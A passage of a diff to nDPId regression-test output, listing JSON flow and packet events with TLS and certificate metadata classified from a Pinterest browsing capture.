CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289733399,"flow_last_seen":1605289733399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289733399,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605289733399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733399,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgkAAAAAoAL9IKzvAAACBAWgBAIICsW6TI0AAAAAAQMDBw=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17595,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605289733420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdlem4qAcsBIEmLB5kd7IUo3\/YpAbucsmOjoioAcZYKoBJXgB0AAAACBAV4AQMDAwQCCArCuW0jxbpMjQ=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17596,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605289733420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733420,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgpjo6IrgBAB+6D8AAABAQgKxbpMosK5bSM="} 
-00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02863{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,li
nk.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02863{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,link.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., 
CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}} 00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 
00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 